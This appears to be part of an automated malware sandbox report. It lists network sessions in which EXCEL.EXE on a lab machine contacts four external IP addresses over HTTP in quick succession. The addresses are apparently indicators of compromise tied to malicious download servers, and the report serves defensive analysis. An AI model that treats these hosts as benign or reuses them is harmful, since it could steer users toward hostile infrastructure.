1 | 192.168.2.22 | 49168 | 8.211.4.209 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 09:15:01.662440062 CEST | 2 | OUT | |
Apr 7, 2021 09:15:02.063385963 CEST | 2 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.22 | 49169 | 192.185.56.250 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 09:15:02.370420933 CEST | 3 | OUT | |
Apr 7, 2021 09:15:02.678519964 CEST | 3 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
3 | 192.168.2.22 | 49170 | 103.211.216.55 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 09:15:03.238714933 CEST | 4 | OUT | |
Apr 7, 2021 09:15:04.319272041 CEST | 5 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
4 | 192.168.2.22 | 49171 | 111.118.215.222 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 09:15:04.909897089 CEST | 6 | OUT | |
Apr 7, 2021 09:15:05.069854021 CEST | 7 | IN | |